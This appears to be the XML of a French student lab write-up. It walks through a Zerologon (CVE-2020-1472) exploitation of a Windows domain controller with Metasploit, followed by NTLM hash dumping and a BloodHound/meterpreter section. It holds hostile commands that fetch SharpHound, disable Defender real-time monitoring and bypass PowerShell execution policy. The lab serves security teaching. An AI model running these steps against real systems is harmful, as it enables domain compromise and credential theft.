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EB8DE" w14:textId="74057B88" w:rsidR="00A64274" w:rsidRDefault="002D539F">
      <w:pPr>
        <w:pStyle w:val="Titre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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="202124"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="202124"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Zerologon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8DF" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00A64274"/>
    <w:p w14:paraId="5F6E002D" w14:textId="11712B7D" w:rsidR="004A6B40" w:rsidRDefault="004A6B40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6592CCD1" wp14:editId="6B698C3D">
            <wp:extent cx="5562600" cy="3300440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="914378461" name="Image 1" descr="Zerologon Vulnerability - Open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rologon Vulnerability - Open Po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796" cy="330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2DB8" w14:textId="77777777" w:rsidR="004A6B40" w:rsidRDefault="004A6B40"/>
    <w:p w14:paraId="0C74ABB7" w14:textId="77777777" w:rsidR="004A6B40" w:rsidRDefault="004A6B40"/>
    <w:p w14:paraId="751EB8E0" w14:textId="23385041" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Ce TP a pour but d’</w:t>
      </w:r>
      <w:r w:rsidR="007A3420">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">xploiter la </w:t>
      </w:r>
      <w:r w:rsidR="007A3420">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>vulnérabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cve-2020-1472) du </w:t>
      </w:r>
      <w:r w:rsidR="007A3420">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> netlologon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E1" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Le Netlogon Remote Protocol est une interface RPC (Remote Procedure Call) qui est utilisée pour l'authentification des utilisateurs et des machines sur les réseaux basés sur le domaine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E2" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="tw-target-text"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cette vulnérabilité permet à un attaquant non authentifié disposant d'un accès réseau à un serveur AD d'établir une session Netlogon vulnérable et éventuellement d'obtenir des privilèges d'administrateur de domaine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E3" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00A64274">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751EB8E4" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>C’est une vulnérabilité microsoft qui cible le contrôleur de domaine dans le processus d’ouverture de session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E5" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Attaquant : Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E6" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Cible : Windows server 2016, contrôleur de domaine, i,e contient une copie de l’annuaire AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E7" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Pour plus d’informations sur le fonctionnement (paramètres et références), regarder les infos du module sous metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8E8" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751EB8FF" wp14:editId="751EB900">
            <wp:extent cx="4667250" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/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B8E9" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:t>Nous avons besoin du nom de domaine «NBNAME ».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8EA" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="8" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="751EB901" wp14:editId="751EB9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0515" cy="49085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EB8EB" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Renseigner ce paramètre dans le module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8EC" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="751EB903" wp14:editId="751EB904">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>201930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-57150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5448300" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="lef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EB8F3" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00A64274"/>
    <w:p w14:paraId="751EB8F4" w14:textId="4AC74340" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:t>Vérifier si le système est vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8F5" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="751EB905" wp14:editId="751EB9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7360" cy="792480"/>
            <wp:effectExtent l="0" t="0" r="0" b="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8415" distB="18415" distL="18415" distR="18415" simplePos="0" relativeHeight="7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="751EB907" wp14:editId="751EB908">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1143000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>593725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1600200" cy="198120"/>
                <wp:effectExtent l="18415" t="18415" r="18415" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="For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980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e 2" path="m0,0l-2147483645,0l-2147483645,-2147483646l0,-2147483646xe" stroked="t" o:allowincell="f" style="position:absolute;margin-left:90pt;margin-top:46.75pt;width:125.95pt;height:15.5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</w:r>
    </w:p>
    <w:p w14:paraId="751EB8F7" w14:textId="5451F12A" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="751EB909" wp14:editId="751EB90A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1431290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="6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mot de passe a été réinitialisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669DC37A" w14:textId="79F3450D" w:rsidR="009C324D" w:rsidRDefault="009C324D">
      <w:r w:rsidRPr="009C324D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AD0C8C" wp14:editId="25534AA6">
            <wp:extent cx="4167187" cy="448774"/>
            <wp:effectExtent l="0" t="0" r="508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32" cy="4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B8F8" w14:textId="77777777" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:t>Exposer les informations confidentielles présent sur l’AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EB8F9" w14:textId="695392A5" w:rsidR="00A64274" w:rsidRDefault="009C324D">
      <w:r w:rsidRPr="009C324D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="462DAE90" wp14:editId="21E3D89C">
            <wp:extent cx="6248856" cy="1719262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853" cy="17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FE39" w14:textId="503CBB44" w:rsidR="000270A4" w:rsidRDefault="000270A4">
      <w:r w:rsidRPr="000270A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E90FF2" wp14:editId="4B4EE697">
            <wp:extent cx="5160388" cy="1593850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="12" name="Image 11">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C53EE61-D729-5D5E-461A-226B7D7DB3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>
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C53EE61-D729-5D5E-461A-226B7D7DB3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612" cy="15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B8FA" w14:textId="71C202F9" w:rsidR="00A64274" w:rsidRDefault="00860C5E">
      <w:r>
        <w:t>L’option « just-dc-ntlm » : permet d’extraire uniquement les hash (NTLM) du fichier NTDS.DIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D43F2" w14:textId="7CBB9BBD" w:rsidR="000270A4" w:rsidRDefault="00F32F53">
      <w:r>
        <w:t xml:space="preserve">Avec metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DB69F" w14:textId="76FFDD59" w:rsidR="00F32F53" w:rsidRDefault="00F32F53">
      <w:r w:rsidRPr="00F32F53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50DB9AAA" wp14:editId="13C94500">
            <wp:extent cx="5268060" cy="419158"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="21167949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94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D7E0" w14:textId="7F7E498A" w:rsidR="00F32F53" w:rsidRDefault="00F32F53">
      <w:r w:rsidRPr="00F32F53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD82301" wp14:editId="67368162">
            <wp:extent cx="5760720" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16176868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86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B8FE" w14:textId="0CFA07C8" w:rsidR="00A64274" w:rsidRDefault="00F32F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F32F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0931BC" wp14:editId="3252C6A0">
            <wp:extent cx="5760720" cy="3576320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="17406794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9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48B" w14:textId="2C0BD4C6" w:rsidR="00F32F53" w:rsidRDefault="00F32F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F32F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEE8486" wp14:editId="704DE0EE">
            <wp:extent cx="5760720" cy="1053465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6156000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0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FD05" w14:textId="2150A240" w:rsidR="00F32F53" w:rsidRDefault="00F32F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F32F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D6D34D6" wp14:editId="10ADBE17">
            <wp:extent cx="5760720" cy="137160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="339787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7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80B0" w14:textId="05BA9B39" w:rsidR="001C6CAA" w:rsidRDefault="001C6CAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C6CAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E18F94" wp14:editId="0106A6F6">
            <wp:extent cx="5760720" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18673578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57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B3E" w14:textId="77777777" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF3F65A" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE5E5D9" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FC6D19" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2024B6EC" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F533B83" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0E38DE" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7614A340" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5914CED2" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D926DDD" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3478CC" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BFE626" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51462B6B" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742AF0B4" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609F5CBA" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C889D65" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C370E2" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4B932E" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A84142D" w14:textId="77777777" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167CBA2D" w14:textId="550F1DF3" w:rsidR="00A176D0" w:rsidRDefault="00A176D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABC5C68" w14:textId="5806C33C" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9E50F" w14:textId="3B924B37" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>wget https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F45AB" w14:textId="6DAF2369" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72EE52AD" wp14:editId="1C134ED7">
            <wp:extent cx="5760720" cy="846455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4824860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6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F9B" w14:textId="53B632E3" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FCB0443" wp14:editId="32243A29">
            <wp:extent cx="5760720" cy="866140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1192583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8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B54" w14:textId="603CAF8D" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13279781" wp14:editId="54C991EB">
            <wp:extent cx="5760720" cy="512445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1618990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B866" w14:textId="714EE818" w:rsidR="00ED1279" w:rsidRDefault="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B2ADB39" wp14:editId="3934CA2C">
            <wp:extent cx="5760720" cy="440690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1804215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5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85DD" w14:textId="77777777" w:rsidR="00ED1279" w:rsidRPr="00ED1279" w:rsidRDefault="00ED1279" w:rsidP="00ED1279">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1279">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell_shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2BE16" w14:textId="77777777" w:rsidR="000601C0" w:rsidRPr="000601C0" w:rsidRDefault="000601C0" w:rsidP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color w:val="444444"/>
        </w:rPr>
        <w:t>meterpreter &gt; powershell_shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28034469" w14:textId="77777777" w:rsidR="000601C0" w:rsidRPr="000601C0" w:rsidRDefault="000601C0" w:rsidP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color w:val="444444"/>
        </w:rPr>
        <w:t>PS &gt; Set-MpPreference -DisableRealtimeMonitoring $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206431B6" w14:textId="77777777" w:rsidR="000601C0" w:rsidRPr="000601C0" w:rsidRDefault="000601C0" w:rsidP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color w:val="444444"/>
        </w:rPr>
        <w:t>PS &gt; Set-ExecutionPolicy Bypass -Scope Process -Force</w:t>
      </w:r>
    </w:p>
